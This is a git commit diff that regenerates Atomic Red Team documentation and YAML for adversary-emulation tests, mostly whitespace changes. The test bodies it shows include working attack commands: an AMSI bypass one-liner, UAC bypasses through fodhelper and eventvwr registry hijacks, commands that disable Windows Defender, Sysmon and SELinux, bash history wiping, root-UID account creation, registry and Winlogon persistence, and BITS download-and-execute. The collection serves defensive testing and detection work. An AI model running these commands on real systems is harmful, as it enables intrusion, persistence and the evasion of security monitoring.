Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-03-16 14:46:43 +00:00
parent 6ec7d4bcf0
commit 9ed5a8b444
3 changed files with 928 additions and 926 deletions
+5 -3
@@ -28,7 +28,8 @@ Executes the Uninstall Method, No Admin Rights Required
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
```
@@ -71,9 +72,10 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$key = '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'
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
+1 -1
@@ -242,7 +242,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
#### Cleanup Commands:
+922 -922
@@ -62,7 +62,7 @@ persistence:
- name: Add command to .bash_profile
description: 'Adds a command to the .bash_profile file of the current user
'
'
supported_platforms:
- macos
- linux
@@ -75,11 +75,11 @@ persistence:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bash_profile
'
'
- name: Add command to .bashrc
description: 'Adds a command to the .bashrc file of the current user
'
'
supported_platforms:
- macos
- linux
@@ -92,7 +92,7 @@ persistence:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bashrc
'
'
T1015:
technique:
x_mitre_permissions_required:
@@ -170,7 +170,7 @@ persistence:
description: 'Attaches cmd.exe to a list of processes. Configure your own Input
arguments to a different executable or list of executables.
'
'
supported_platforms:
- windows
input_arguments:
@@ -178,7 +178,7 @@ persistence:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -186,7 +186,7 @@ persistence:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -303,7 +303,7 @@ persistence:
- name: Admin Account Manipulate
description: 'Manipulate Admin Account Name
'
'
supported_platforms:
- windows
executor:
@@ -522,7 +522,7 @@ persistence:
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
'
supported_platforms:
- windows
input_arguments:
@@ -535,7 +535,7 @@ persistence:
elevation_required: true
command: 'reg.exe import #{registry_file}
'
'
T1138:
technique:
x_mitre_data_sources:
@@ -642,7 +642,7 @@ persistence:
- name: New shim database files created in the default shim database directory
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -657,7 +657,7 @@ persistence:
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -772,10 +772,10 @@ persistence:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
'
'
cleanup_command: 'del #{local_file} >nul 2>&1
'
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -796,10 +796,10 @@ persistence:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
'
'
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
'
'
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
@@ -947,7 +947,7 @@ persistence:
- name: Firefox
description: 'Create a file called test.wma, with the duration of 30 seconds
'
'
supported_platforms:
- linux
- windows
@@ -1033,7 +1033,7 @@ persistence:
- name: Change Default File Association
description: 'Change Default File Association From cmd.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -1050,7 +1050,7 @@ persistence:
elevation_required: false
command: 'cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
'
'
T1136:
technique:
x_mitre_permissions_required:
@@ -1123,7 +1123,7 @@ persistence:
- name: Create a user account on a Linux system
description: 'Create a user via useradd
'
'
supported_platforms:
- linux
input_arguments:
@@ -1140,14 +1140,14 @@ persistence:
elevation_required: true
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
'
'
cleanup_command: 'userdel #{username}
'
'
- name: Create a user account on a MacOS system
description: 'Creates a user on a MacOS system with dscl
'
'
supported_platforms:
- macos
input_arguments:
@@ -1171,11 +1171,11 @@ persistence:
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
cleanup_command: 'dscl . -delete /Users/#{username}
'
'
- name: Create a new user in a command prompt
description: 'Creates a new user in a command prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -1192,14 +1192,14 @@ persistence:
elevation_required: true
command: 'net user /add "#{username}" "#{password}"
'
'
cleanup_command: 'net user /del "#{username}"
'
'
- name: Create a new user in PowerShell
description: 'Creates a new user in PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -1212,15 +1212,15 @@ persistence:
elevation_required: true
command: 'New-LocalUser -Name "#{username}" -NoPassword
'
'
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
'
'
- name: Create a new user in Linux with `root` UID and GID.
description: 'Creates a new user in Linux and adds the user to the `root` group.
This technique was used by adversaries during the Butter attack campaign.
'
'
supported_platforms:
- linux
input_arguments:
@@ -1411,7 +1411,7 @@ persistence:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
'
supported_platforms:
- macos
input_arguments:
@@ -1583,7 +1583,7 @@ persistence:
- name: Create a hidden file in a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
'
supported_platforms:
- linux
- macos
@@ -1595,11 +1595,11 @@ persistence:
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
'
'
- name: Mac Hidden file
description: 'Hide a file on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1608,12 +1608,12 @@ persistence:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
'
'
- name: Create Windows System File with Attrib
description: 'Creates a file and marks it as a system file using the attrib.exe
utility.
'
'
supported_platforms:
- windows
executor:
@@ -1624,11 +1624,11 @@ persistence:
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
'
- name: Create Windows Hidden File with Attrib
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
'
'
supported_platforms:
- windows
executor:
@@ -1639,11 +1639,11 @@ persistence:
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
'
- name: Hidden files
description: 'Requires Apple Dev Tools
'
'
supported_platforms:
- macos
input_arguments:
@@ -1656,11 +1656,11 @@ persistence:
elevation_required: false
command: 'setfile -a V #(unknown)
'
'
- name: Hide a Directory
description: 'Hide a directory on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1671,11 +1671,11 @@ persistence:
chflags hidden /var/tmp/T1158_mac.txt
cleanup_command: 'rm /var/tmp/T1158_mac.txt
'
'
- name: Show all hidden files
description: 'Show all hidden files on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1683,15 +1683,15 @@ persistence:
elevation_required: false
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
'
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
'
'
- name: Create ADS command prompt
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -1709,15 +1709,15 @@ persistence:
command: |
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
'
'
- name: Create ADS PowerShell
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -1739,7 +1739,7 @@ persistence:
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
'
'
T1179:
technique:
x_mitre_data_sources:
@@ -1869,7 +1869,7 @@ persistence:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -2067,7 +2067,7 @@ persistence:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -2085,15 +2085,15 @@ persistence:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -2221,7 +2221,7 @@ persistence:
description: 'This test uses the insmod command to load a kernel module for
Linux.
'
'
supported_platforms:
- linux
input_arguments:
@@ -2238,10 +2238,10 @@ persistence:
elevation_required: true
command: 'insmod #{kernel_module_file}
'
'
cleanup_command: 'rmmod #{module_name}
'
'
T1159:
technique:
x_mitre_permissions_required:
@@ -2326,7 +2326,7 @@ persistence:
- name: Launch Agent
description: 'Create a plist and execute it
'
'
supported_platforms:
- macos
executor:
@@ -2428,7 +2428,7 @@ persistence:
- name: Launch Daemon
description: 'Utilize LaunchDaemon to launch `Hello World`
'
'
supported_platforms:
- macos
executor:
@@ -2512,14 +2512,14 @@ persistence:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1168:
technique:
x_mitre_data_sources:
@@ -2607,7 +2607,7 @@ persistence:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
'
supported_platforms:
- macos
- linux
@@ -2624,13 +2624,13 @@ persistence:
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
'
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
'
supported_platforms:
- macos
- linux
@@ -2647,7 +2647,7 @@ persistence:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
@@ -2752,7 +2752,7 @@ persistence:
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
directory.
'
'
supported_platforms:
- windows
input_arguments:
@@ -2777,7 +2777,7 @@ persistence:
- name: Scheduled Task Startup Script
description: 'Run an exe on user logon or system startup
'
'
supported_platforms:
- windows
executor:
@@ -2792,7 +2792,7 @@ persistence:
- name: Logon Scripts - Mac
description: 'Mac logon script
'
'
supported_platforms:
- macos
executor:
@@ -2808,7 +2808,7 @@ persistence:
description: 'vbs files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -2826,7 +2826,7 @@ persistence:
description: 'jse files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -2844,7 +2844,7 @@ persistence:
description: 'bat files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -3001,7 +3001,7 @@ persistence:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
'
'
supported_platforms:
- windows
input_arguments:
@@ -3013,7 +3013,7 @@ persistence:
name: command_prompt
command: 'netsh.exe add helper #{helper_file}
'
'
T1050:
technique:
x_mitre_permissions_required:
@@ -3089,7 +3089,7 @@ persistence:
- name: Service Installation
description: 'Installs A Local Service
'
'
supported_platforms:
- windows
input_arguments:
@@ -3120,7 +3120,7 @@ persistence:
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: 'Installs A Local Service via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -3424,7 +3424,7 @@ persistence:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -3517,7 +3517,7 @@ persistence:
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -3598,7 +3598,7 @@ persistence:
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
>> /etc/rc.common
'
'
T1164:
technique:
x_mitre_permissions_required:
@@ -3767,7 +3767,7 @@ persistence:
- name: Reg Key Run
description: 'Run Key Persistence
'
'
supported_platforms:
- windows
input_arguments:
@@ -3780,15 +3780,15 @@ persistence:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
'
'
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f
'
'
- name: Reg Key RunOnce
description: 'RunOnce Key Persistence
'
'
supported_platforms:
- windows
input_arguments:
@@ -3801,15 +3801,15 @@ persistence:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
'
'
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f
'
'
- name: PowerShell Registry RunOnce
description: 'RunOnce Key Persistence via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -3830,7 +3830,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
'
'
T1053:
technique:
x_mitre_permissions_required:
@@ -3933,7 +3933,7 @@ persistence:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -3952,14 +3952,14 @@ persistence:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -3989,10 +3989,10 @@ persistence:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -4012,7 +4012,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1180:
technique:
x_mitre_data_sources:
@@ -4075,7 +4075,7 @@ persistence:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
'
'
supported_platforms:
- windows
input_arguments:
@@ -4416,7 +4416,7 @@ persistence:
description: 'Make, change owner, and change file attributes on a C source code
file
'
'
supported_platforms:
- macos
- linux
@@ -4442,7 +4442,7 @@ persistence:
- name: Set a SetUID flag on file
description: 'This test sets the SetUID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -4460,11 +4460,11 @@ persistence:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
- name: Set a SetGID flag on file
description: 'This test sets the SetGID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -4482,7 +4482,7 @@ persistence:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
T1023:
technique:
x_mitre_permissions_required:
@@ -4548,11 +4548,11 @@ persistence:
command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe
>> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
'
'
- name: Create shortcut to cmd in startup folders
description: 'LNK file to launch CMD placed in startup folder
'
'
supported_platforms:
- windows
executor:
@@ -4648,10 +4648,10 @@ persistence:
elevation_required: true
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
'
'
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
'
'
T1501:
technique:
x_mitre_data_sources:
@@ -4750,7 +4750,7 @@ persistence:
description: 'This test creates a Systemd service unit file and enables it as
a service.
'
'
supported_platforms:
- linux
input_arguments:
@@ -4966,10 +4966,10 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
'
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
'
T1084:
technique:
x_mitre_permissions_required:
@@ -5138,7 +5138,7 @@ persistence:
description: 'PowerShell code to set Winlogon shell key to execute a binary
at logon along with explorer.exe.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5152,16 +5152,16 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
'
'
- name: Winlogon Userinit Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon userinit key to execute a binary
at logon along with userinit.exe.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5175,16 +5175,16 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
'
'
- name: Winlogon Notify Key Logon Persistence - PowerShell
description: 'PowerShell code to set Winlogon Notify key to execute a notification
package DLL at logon.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5201,7 +5201,7 @@ persistence:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
'
'
defense-evasion:
T1134:
technique:
@@ -5516,10 +5516,10 @@ defense-evasion:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
'
'
cleanup_command: 'del #{local_file} >nul 2>&1
'
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -5540,10 +5540,10 @@ defense-evasion:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
'
'
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
'
'
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
@@ -5639,7 +5639,7 @@ defense-evasion:
- name: Pad Binary to Change Hash - Linux/macOS dd
description: 'Uses dd to add a zero to the binary to change the hash
'
'
supported_platforms:
- macos
- linux
@@ -5653,7 +5653,7 @@ defense-evasion:
elevation_required: false
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
'
'
T1088:
technique:
x_mitre_data_sources:
@@ -5755,7 +5755,7 @@ defense-evasion:
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -5770,12 +5770,12 @@ defense-evasion:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
'
'
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -5792,12 +5792,12 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
'
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5814,12 +5814,12 @@ defense-evasion:
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
'
'
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5838,12 +5838,12 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC using ComputerDefaults - PowerShell
description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe
on Windows 10
'
'
supported_platforms:
- windows
input_arguments:
@@ -5862,13 +5862,13 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC by Mocking Trusted Directories
description: 'Creates a fake "trusted directory" and copies a binary to bypass
UAC. The UAC bypass may not work on fully patched systems, however the directory
structure will be created.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5964,7 +5964,7 @@ defense-evasion:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
'
supported_platforms:
- windows
input_arguments:
@@ -5984,12 +5984,12 @@ defense-evasion:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_path}
'
'
- name: CMSTP Executing UAC Bypass
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
'
supported_platforms:
- windows
input_arguments:
@@ -6009,7 +6009,7 @@ defense-evasion:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_uac} /au
'
'
T1146:
technique:
x_mitre_data_sources:
@@ -6062,7 +6062,7 @@ defense-evasion:
- name: Clear Bash history (rm)
description: 'Clears bash history via rm
'
'
supported_platforms:
- linux
- macos
@@ -6070,11 +6070,11 @@ defense-evasion:
name: sh
command: 'rm ~/.bash_history
'
'
- name: Clear Bash history (echo)
description: 'Clears bash history via rm
'
'
supported_platforms:
- linux
- macos
@@ -6082,11 +6082,11 @@ defense-evasion:
name: sh
command: 'echo "" > ~/.bash_history
'
'
- name: Clear Bash history (cat dev/null)
description: 'Clears bash history via cat /dev/null
'
'
supported_platforms:
- linux
- macos
@@ -6094,11 +6094,11 @@ defense-evasion:
name: sh
command: 'cat /dev/null > ~/.bash_history
'
'
- name: Clear Bash history (ln dev/null)
description: 'Clears bash history via a symlink to /dev/null
'
'
supported_platforms:
- linux
- macos
@@ -6106,23 +6106,23 @@ defense-evasion:
name: sh
command: 'ln -sf /dev/null ~/.bash_history
'
'
- name: Clear Bash history (truncate)
description: 'Clears bash history via truncate
'
'
supported_platforms:
- linux
executor:
name: sh
command: 'truncate -s0 ~/.bash_history
'
'
- name: Clear history of a bunch of shells
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
'
supported_platforms:
- linux
- macos
@@ -6220,7 +6220,7 @@ defense-evasion:
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
#{input_file}
'
'
cleanup_command: 'del #{output_file} >nul 2>&1'
T1223:
technique:
@@ -6289,7 +6289,7 @@ defense-evasion:
- name: Compiled HTML Help Local Payload
description: 'Uses hh.exe to execute a local compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -6309,11 +6309,11 @@ defense-evasion:
elevation_required: false
command: 'hh.exe #{local_chm_file}
'
'
- name: Compiled HTML Help Remote Payload
description: 'Uses hh.exe to execute a remote compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -6326,7 +6326,7 @@ defense-evasion:
elevation_required: false
command: 'hh.exe #{remote_chm_file}
'
'
T1090:
technique:
x_mitre_data_sources:
@@ -6404,7 +6404,7 @@ defense-evasion:
name: sh
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
'
'
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -6514,7 +6514,7 @@ defense-evasion:
description: 'This test simulates an adversary leveraging control.exe to execute
a payload and pops calc
'
'
supported_platforms:
- windows
input_arguments:
@@ -6534,7 +6534,7 @@ defense-evasion:
elevation_required: false
command: 'control.exe #{cpl_file_path}
'
'
T1207:
technique:
x_mitre_data_sources:
@@ -6791,7 +6791,7 @@ defense-evasion:
updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl
dll to be loaded
'
'
supported_platforms:
- windows
input_arguments:
@@ -6868,7 +6868,7 @@ defense-evasion:
- name: Deobfuscate/Decode Files Or Information
description: 'Encode/Decode executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -6889,7 +6889,7 @@ defense-evasion:
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
'
'
supported_platforms:
- windows
input_arguments:
@@ -6958,7 +6958,7 @@ defense-evasion:
- name: Disable iptables firewall
description: 'Disables the iptables firewall
'
'
supported_platforms:
- linux
executor:
@@ -6977,7 +6977,7 @@ defense-evasion:
- name: Disable syslog
description: 'Disables syslog collection
'
'
supported_platforms:
- linux
executor:
@@ -6994,7 +6994,7 @@ defense-evasion:
- name: Disable Cb Response
description: 'Disable the Cb Response service
'
'
supported_platforms:
- linux
executor:
@@ -7011,52 +7011,52 @@ defense-evasion:
- name: Disable SELinux
description: 'Disables SELinux enforcement
'
'
supported_platforms:
- linux
executor:
name: sh
command: 'setenforce 0
'
'
- name: Disable Carbon Black Response
description: 'Disables Carbon Black Response
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
'
'
- name: Disable LittleSnitch
description: 'Disables LittleSnitch
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
'
- name: Disable OpenDNS Umbrella
description: 'Disables OpenDNS Umbrella
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
'
- name: Unload Sysmon Filter Driver
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7075,10 +7075,10 @@ defense-evasion:
elevation_required: true
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}
'
'
command: 'fltmc.exe unload #{sysmon_driver}
'
'
cleanup_command: |
sc stop sysmon
fltmc.exe load #{sysmon_driver}
@@ -7099,19 +7099,19 @@ defense-evasion:
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit
0} else {exit 1}
'
'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
'
'
cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:false
'
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
'
'
supported_platforms:
- windows
input_arguments:
@@ -7138,10 +7138,10 @@ defense-evasion:
elevation_required: true
command: 'sysmon -u
'
'
cleanup_command: 'sysmon -i -accepteula
'
'
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
@@ -7165,16 +7165,16 @@ defense-evasion:
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
'
'
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
'
'
- name: Disable Arbitrary Security Windows Service
description: 'With administrative rights, an adversary can disable Windows Services
related to security products.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7223,12 +7223,12 @@ defense-evasion:
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
'
'
- name: Tamper with Windows Defender ATP PowerShell
description: 'Attempting to disable scheduled scanning and other parts of windows
defender atp
'
'
supported_platforms:
- windows
executor:
@@ -7248,7 +7248,7 @@ defense-evasion:
description: 'Attempting to disable scheduled scanning and other parts of windows
defender atp
'
'
supported_platforms:
- windows
executor:
@@ -7264,7 +7264,7 @@ defense-evasion:
- name: Tamper with Windows Defender Registry
description: 'Disable Windows Defender from starting after a reboot
'
'
supported_platforms:
- windows
executor:
